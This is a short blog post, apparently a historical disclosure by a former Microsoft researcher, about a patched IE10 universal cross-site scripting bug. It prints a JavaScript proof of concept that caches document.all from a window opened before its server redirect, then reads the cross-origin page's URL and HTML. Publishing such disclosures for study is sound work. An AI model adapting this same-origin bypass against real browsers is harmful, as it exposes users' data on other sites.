IE10 UXSS: Caching document.all from New Window Before Server Redirect

I found another variant of the document.all caching technique, this time using window.open rather than a modeless dialog. Saving a reference to document.all from a newly opened window before its server redirect completed preserved access to the post-redirect document’s DOM, including outerHTML and URL.

var cached_document_all;
function main()
{
    var win = window.open("redirect.aspx","","width=200,height=200");

    win.setTimeout('alert("Please, do not close this alert, just wait 4 seconds until bing loads...")');
    
    cached_document_all = win.document.all;

    setTimeout('accessWindowDOM()', 4000);
}
function accessWindowDOM()
{
    try
    {
        // Sometimes the first try does not work on some IE10 builds, so we retry in the catch block
        alert(cached_document_all[0].ownerDocument.URL + "\n\n" + cached_document_all[0].outerHTML);
    }
    catch(e)
    {   // Exact same code as above.
        alert(cached_document_all[0].ownerDocument.URL + "\n\n" + cached_document_all[0].outerHTML);
    }
}

A setTimeout in the new window blocked the redirect long enough to grab document.all. After the redirect, cached_document_all[0].ownerDocument.URL and outerHTML both reflected the post-redirect cross-origin document. This is closely related to the earlier modeless-dialog variant, but demonstrates the same issue applies to window.open targets.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10: msSetPointerCapture Allows iframe to Intercept Clicks Outside Its Bounds] :: [IE10: Content and Address Bar Spoof via onunload Sync XMLHttpRequest Freeze] >